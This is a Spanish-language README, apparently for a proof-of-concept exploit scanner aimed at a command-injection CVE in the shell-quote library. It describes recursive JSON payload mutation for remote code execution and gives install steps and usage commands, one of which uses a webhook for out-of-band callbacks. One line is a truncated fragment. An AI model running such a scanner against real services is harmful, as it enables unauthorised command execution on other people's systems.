
Exploit de prueba de concepto para CVE-2026-9277, una vulnerabilidad de inyección de comandos en la biblioteca shell-quote. Realiza un recorrido JSON recursivo con mutación combinatoria para desencadenar RCE, compatible con verificación OOB y registro sin ruido.
Un script de exploit Proof of Concept (PoC) especializado diseñado para verificar y demostrar CVE-2026-9277, una vulnerabilidad estructural de inyección de comandos encontrada en versiones heredadas de la librería shell-quote (<= 1.8.3).
El escáner realiza una manipulación estructural profunda en payloads JSON de entrada para exponer vectores de ejecución remota de código (RCE) mediante traversal recursivo, evitando falsos positivos usando un motor dinámico de temporización de línea base de red.
{"op": "..."} de los argumentos para eludir con éxito los controles de aislamiento de cadenas.Asegúrate de tener Python 3.10+ y los paquetes requeridos instalados:
git clone https://github.com/DylanZahedi/CVE-2026-9277.git
cd CVE-2026-9277
pip install requests urllib3
python CVE-2026-9277.py -u "https://example.com/command" -b '{"message_tokens": ["Hello", "from", "normal user"]}'
python CVE-2026-9277.py -u "https://example.com/command" -b '{"user": {"commands": ["a", "b"]}}' -w "https://webhook.site/your-uuid-here"
